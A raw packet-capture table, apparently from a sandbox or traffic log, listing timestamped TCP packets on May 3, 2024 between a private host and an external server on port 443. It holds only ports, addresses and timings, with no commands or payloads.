May 3, 2024 02:08:42.364480019 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.364588022 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.364604950 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.364655018 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.364660978 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.364687920 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.364707947 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.542335033 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.542359114 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.542412996 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.542434931 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.542447090 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.542485952 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.542519093 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.543311119 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.543328047 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.543395996 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.543404102 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.543446064 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.717160940 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.717181921 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.717273951 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.717286110 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.717334032 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.717573881 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.717590094 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.717644930 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.717653036 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.717695951 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.717962980 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.717979908 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.718033075 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.718039036 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.718084097 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.718493938 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.718508959 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.718559027 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.718565941 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.718605042 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.718738079 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.718751907 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.718800068 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.718806028 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.718849897 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.719069004 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.719084978 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.719130039 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.719136000 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.719181061 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.895742893 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.895768881 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.895910978 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.895924091 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.895982981 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.896079063 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.896106958 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.896164894 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.896173954 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.896203995 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.896226883 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.896426916 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.896441936 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.896505117 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.896512985 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.896559000 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.896843910 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.896858931 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.896918058 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.896924019 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.896979094 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.897047997 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.897083044 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.897109032 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.897114038 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.897126913 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.897150993 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.897181034 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.898713112 CEST	49745	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.898726940 CEST	443	49745	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.934190989 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.934223890 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:42.934310913 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.934648037 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:42.934658051 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:43.295383930 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:43.295490026 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:43.296000004 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:43.296010017 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:43.296183109 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:43.296188116 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:43.956307888 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:43.956336975 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:43.956357002 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:43.956440926 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:43.956465960 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:43.956490993 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:43.956521988 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:43.956615925 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:43.956638098 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:43.956676960 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:43.956685066 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:43.956698895 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:43.956722975 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.131419897 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.131452084 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.131584883 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.131599903 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.131645918 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.131711006 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.131730080 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.131764889 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.131771088 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.131803036 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.131824970 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.132486105 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.132522106 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.132551908 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.132559061 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.132586002 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.132592916 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.132618904 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.132630110 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.133172989 CEST	49746	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.133188009 CEST	443	49746	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.592331886 CEST	49747	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.592371941 CEST	443	49747	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.592442036 CEST	49747	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.592690945 CEST	49747	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.592705965 CEST	443	49747	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.950268984 CEST	443	49747	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.950351954 CEST	49747	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.950814009 CEST	49747	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.950819016 CEST	443	49747	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.950984955 CEST	49747	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.950997114 CEST	443	49747	168.119.248.46	192.168.2.5
May 3, 2024 02:08:44.951014996 CEST	49747	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:44.951020002 CEST	443	49747	168.119.248.46	192.168.2.5
May 3, 2024 02:08:45.431492090 CEST	443	49747	168.119.248.46	192.168.2.5
May 3, 2024 02:08:45.431566954 CEST	443	49747	168.119.248.46	192.168.2.5
May 3, 2024 02:08:45.431668043 CEST	49747	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:45.432032108 CEST	49747	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:45.432043076 CEST	443	49747	168.119.248.46	192.168.2.5
May 3, 2024 02:08:45.432074070 CEST	49747	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:45.432113886 CEST	49747	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:45.488424063 CEST	49748	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:45.488467932 CEST	443	49748	168.119.248.46	192.168.2.5
May 3, 2024 02:08:45.488549948 CEST	49748	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:45.488842964 CEST	49748	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:45.488857985 CEST	443	49748	168.119.248.46	192.168.2.5
May 3, 2024 02:08:45.846530914 CEST	443	49748	168.119.248.46	192.168.2.5
May 3, 2024 02:08:45.846651077 CEST	49748	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:45.847105026 CEST	49748	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:45.847117901 CEST	443	49748	168.119.248.46	192.168.2.5
May 3, 2024 02:08:45.847310066 CEST	49748	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:45.847315073 CEST	443	49748	168.119.248.46	192.168.2.5
May 3, 2024 02:08:46.305660009 CEST	443	49748	168.119.248.46	192.168.2.5
May 3, 2024 02:08:46.305685043 CEST	443	49748	168.119.248.46	192.168.2.5
May 3, 2024 02:08:46.305743933 CEST	443	49748	168.119.248.46	192.168.2.5
May 3, 2024 02:08:46.305761099 CEST	49748	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:46.305802107 CEST	49748	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:46.306096077 CEST	49748	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:46.306113958 CEST	443	49748	168.119.248.46	192.168.2.5
May 3, 2024 02:08:46.309000969 CEST	49749	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:46.309036016 CEST	443	49749	168.119.248.46	192.168.2.5
May 3, 2024 02:08:46.309118032 CEST	49749	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:46.309395075 CEST	49749	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:46.309411049 CEST	443	49749	168.119.248.46	192.168.2.5
May 3, 2024 02:08:46.667201996 CEST	443	49749	168.119.248.46	192.168.2.5
May 3, 2024 02:08:46.667300940 CEST	49749	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:46.667738914 CEST	49749	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:46.667747974 CEST	443	49749	168.119.248.46	192.168.2.5
May 3, 2024 02:08:46.667912006 CEST	49749	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:46.667918921 CEST	443	49749	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.126777887 CEST	443	49749	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.126864910 CEST	443	49749	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.126869917 CEST	49749	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.126909971 CEST	49749	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.127190113 CEST	49749	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.127208948 CEST	443	49749	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.152266026 CEST	49750	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.152304888 CEST	443	49750	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.152388096 CEST	49750	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.152637959 CEST	49750	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.152652025 CEST	443	49750	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.509052038 CEST	443	49750	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.509162903 CEST	49750	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.509696007 CEST	49750	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.509705067 CEST	443	49750	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.509794950 CEST	49750	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.509799004 CEST	443	49750	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.509834051 CEST	49750	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.509839058 CEST	443	49750	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.987529039 CEST	443	49750	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.987585068 CEST	49750	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.987601995 CEST	443	49750	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.987647057 CEST	49750	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.987721920 CEST	49750	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.987721920 CEST	49750	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.987740040 CEST	443	49750	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.987786055 CEST	49750	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.994142056 CEST	49751	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.994169950 CEST	443	49751	168.119.248.46	192.168.2.5
May 3, 2024 02:08:47.994271040 CEST	49751	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.994797945 CEST	49751	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:47.994811058 CEST	443	49751	168.119.248.46	192.168.2.5
May 3, 2024 02:08:48.350680113 CEST	443	49751	168.119.248.46	192.168.2.5
May 3, 2024 02:08:48.350770950 CEST	49751	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:48.351241112 CEST	49751	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:48.351250887 CEST	443	49751	168.119.248.46	192.168.2.5
May 3, 2024 02:08:48.351423979 CEST	49751	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:48.351428986 CEST	443	49751	168.119.248.46	192.168.2.5
May 3, 2024 02:08:48.351474047 CEST	49751	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:48.351479053 CEST	443	49751	168.119.248.46	192.168.2.5
May 3, 2024 02:08:48.825676918 CEST	443	49751	168.119.248.46	192.168.2.5
May 3, 2024 02:08:48.825747013 CEST	443	49751	168.119.248.46	192.168.2.5
May 3, 2024 02:08:48.825782061 CEST	49751	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:48.825798035 CEST	49751	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:48.825922012 CEST	49751	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:48.825942993 CEST	443	49751	168.119.248.46	192.168.2.5
May 3, 2024 02:08:48.825956106 CEST	49751	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:48.825984001 CEST	49751	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:48.831649065 CEST	49752	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:48.831676960 CEST	443	49752	168.119.248.46	192.168.2.5
May 3, 2024 02:08:48.831757069 CEST	49752	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:48.832021952 CEST	49752	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:48.832029104 CEST	443	49752	168.119.248.46	192.168.2.5
May 3, 2024 02:08:49.189213991 CEST	443	49752	168.119.248.46	192.168.2.5
May 3, 2024 02:08:49.189289093 CEST	49752	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:49.189682961 CEST	49752	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:49.189687967 CEST	443	49752	168.119.248.46	192.168.2.5
May 3, 2024 02:08:49.189848900 CEST	49752	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:49.189852953 CEST	443	49752	168.119.248.46	192.168.2.5
May 3, 2024 02:08:49.189884901 CEST	49752	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:49.189889908 CEST	443	49752	168.119.248.46	192.168.2.5
May 3, 2024 02:08:49.665996075 CEST	443	49752	168.119.248.46	192.168.2.5
May 3, 2024 02:08:49.666075945 CEST	443	49752	168.119.248.46	192.168.2.5
May 3, 2024 02:08:49.666090012 CEST	49752	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:49.666121006 CEST	49752	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:49.666239977 CEST	49752	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:49.666253090 CEST	443	49752	168.119.248.46	192.168.2.5
May 3, 2024 02:08:49.666270018 CEST	49752	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:49.666297913 CEST	49752	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:49.671797037 CEST	49753	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:49.671825886 CEST	443	49753	168.119.248.46	192.168.2.5
May 3, 2024 02:08:49.671906948 CEST	49753	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:49.672173977 CEST	49753	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:49.672188997 CEST	443	49753	168.119.248.46	192.168.2.5
May 3, 2024 02:08:50.029436111 CEST	443	49753	168.119.248.46	192.168.2.5
May 3, 2024 02:08:50.029557943 CEST	49753	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.030098915 CEST	49753	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.030103922 CEST	443	49753	168.119.248.46	192.168.2.5
May 3, 2024 02:08:50.030288935 CEST	49753	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.030292988 CEST	443	49753	168.119.248.46	192.168.2.5
May 3, 2024 02:08:50.030340910 CEST	49753	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.030345917 CEST	443	49753	168.119.248.46	192.168.2.5
May 3, 2024 02:08:50.509746075 CEST	443	49753	168.119.248.46	192.168.2.5
May 3, 2024 02:08:50.509818077 CEST	443	49753	168.119.248.46	192.168.2.5
May 3, 2024 02:08:50.509970903 CEST	49753	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.510032892 CEST	49753	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.510399103 CEST	49753	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.510410070 CEST	443	49753	168.119.248.46	192.168.2.5
May 3, 2024 02:08:50.510421991 CEST	49753	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.510472059 CEST	49753	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.517982960 CEST	49754	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.518014908 CEST	443	49754	168.119.248.46	192.168.2.5
May 3, 2024 02:08:50.518110037 CEST	49754	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.518342018 CEST	49754	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.518357992 CEST	443	49754	168.119.248.46	192.168.2.5
May 3, 2024 02:08:50.874424934 CEST	443	49754	168.119.248.46	192.168.2.5
May 3, 2024 02:08:50.874526024 CEST	49754	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.874995947 CEST	49754	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.875003099 CEST	443	49754	168.119.248.46	192.168.2.5
May 3, 2024 02:08:50.875195980 CEST	49754	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.875201941 CEST	443	49754	168.119.248.46	192.168.2.5
May 3, 2024 02:08:50.875246048 CEST	49754	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:50.875252008 CEST	443	49754	168.119.248.46	192.168.2.5
May 3, 2024 02:08:51.348923922 CEST	443	49754	168.119.248.46	192.168.2.5
May 3, 2024 02:08:51.349026918 CEST	443	49754	168.119.248.46	192.168.2.5
May 3, 2024 02:08:51.349050999 CEST	49754	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:51.349080086 CEST	49754	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:51.349199057 CEST	49754	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:51.349211931 CEST	443	49754	168.119.248.46	192.168.2.5
May 3, 2024 02:08:51.349222898 CEST	49754	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:51.349267006 CEST	49754	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:51.354998112 CEST	49755	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:51.355036020 CEST	443	49755	168.119.248.46	192.168.2.5
May 3, 2024 02:08:51.355117083 CEST	49755	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:51.355420113 CEST	49755	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:51.355441093 CEST	443	49755	168.119.248.46	192.168.2.5
May 3, 2024 02:08:51.712233067 CEST	443	49755	168.119.248.46	192.168.2.5
May 3, 2024 02:08:51.712368011 CEST	49755	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:51.712867975 CEST	49755	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:51.712874889 CEST	443	49755	168.119.248.46	192.168.2.5
May 3, 2024 02:08:51.713048935 CEST	49755	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:51.713053942 CEST	443	49755	168.119.248.46	192.168.2.5
May 3, 2024 02:08:51.713105917 CEST	49755	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:51.713110924 CEST	443	49755	168.119.248.46	192.168.2.5
May 3, 2024 02:08:52.187664986 CEST	443	49755	168.119.248.46	192.168.2.5
May 3, 2024 02:08:52.187742949 CEST	443	49755	168.119.248.46	192.168.2.5
May 3, 2024 02:08:52.187794924 CEST	49755	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:52.187822104 CEST	49755	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:52.241206884 CEST	49755	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:52.241221905 CEST	443	49755	168.119.248.46	192.168.2.5
May 3, 2024 02:08:52.241259098 CEST	49755	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:52.241322994 CEST	49755	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:52.329607010 CEST	49756	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:52.329652071 CEST	443	49756	168.119.248.46	192.168.2.5
May 3, 2024 02:08:52.329736948 CEST	49756	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:52.330029964 CEST	49756	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:52.330043077 CEST	443	49756	168.119.248.46	192.168.2.5
May 3, 2024 02:08:52.687546015 CEST	443	49756	168.119.248.46	192.168.2.5
May 3, 2024 02:08:52.687609911 CEST	49756	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:53.506340027 CEST	49756	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:53.506362915 CEST	443	49756	168.119.248.46	192.168.2.5
May 3, 2024 02:08:53.506603956 CEST	49756	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:53.506608963 CEST	443	49756	168.119.248.46	192.168.2.5
May 3, 2024 02:08:53.506648064 CEST	49756	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:53.506652117 CEST	443	49756	168.119.248.46	192.168.2.5
May 3, 2024 02:08:53.987627029 CEST	443	49756	168.119.248.46	192.168.2.5
May 3, 2024 02:08:53.987696886 CEST	443	49756	168.119.248.46	192.168.2.5
May 3, 2024 02:08:53.987711906 CEST	49756	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:53.987741947 CEST	49756	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:53.987802982 CEST	49756	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:53.987823963 CEST	443	49756	168.119.248.46	192.168.2.5
May 3, 2024 02:08:53.987834930 CEST	49756	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:53.987870932 CEST	49756	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:53.995182991 CEST	49757	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:53.995215893 CEST	443	49757	168.119.248.46	192.168.2.5
May 3, 2024 02:08:53.995285988 CEST	49757	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:53.995490074 CEST	49757	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:53.995506048 CEST	443	49757	168.119.248.46	192.168.2.5
May 3, 2024 02:08:54.352749109 CEST	443	49757	168.119.248.46	192.168.2.5
May 3, 2024 02:08:54.352838993 CEST	49757	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:54.353327036 CEST	49757	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:54.353338957 CEST	443	49757	168.119.248.46	192.168.2.5
May 3, 2024 02:08:54.353506088 CEST	49757	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:54.353513002 CEST	443	49757	168.119.248.46	192.168.2.5
May 3, 2024 02:08:54.353540897 CEST	49757	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:54.353549004 CEST	443	49757	168.119.248.46	192.168.2.5
May 3, 2024 02:08:54.827019930 CEST	443	49757	168.119.248.46	192.168.2.5
May 3, 2024 02:08:54.827089071 CEST	443	49757	168.119.248.46	192.168.2.5
May 3, 2024 02:08:54.827146053 CEST	49757	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:54.827239990 CEST	49757	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:54.827266932 CEST	443	49757	168.119.248.46	192.168.2.5
May 3, 2024 02:08:54.827277899 CEST	49757	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:54.827311039 CEST	49757	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:54.833288908 CEST	49758	443	192.168.2.5	168.119.248.46
May 3, 2024 02:08:54.833323956 CEST	443	49758	168.119.248.46	192.168.2.5
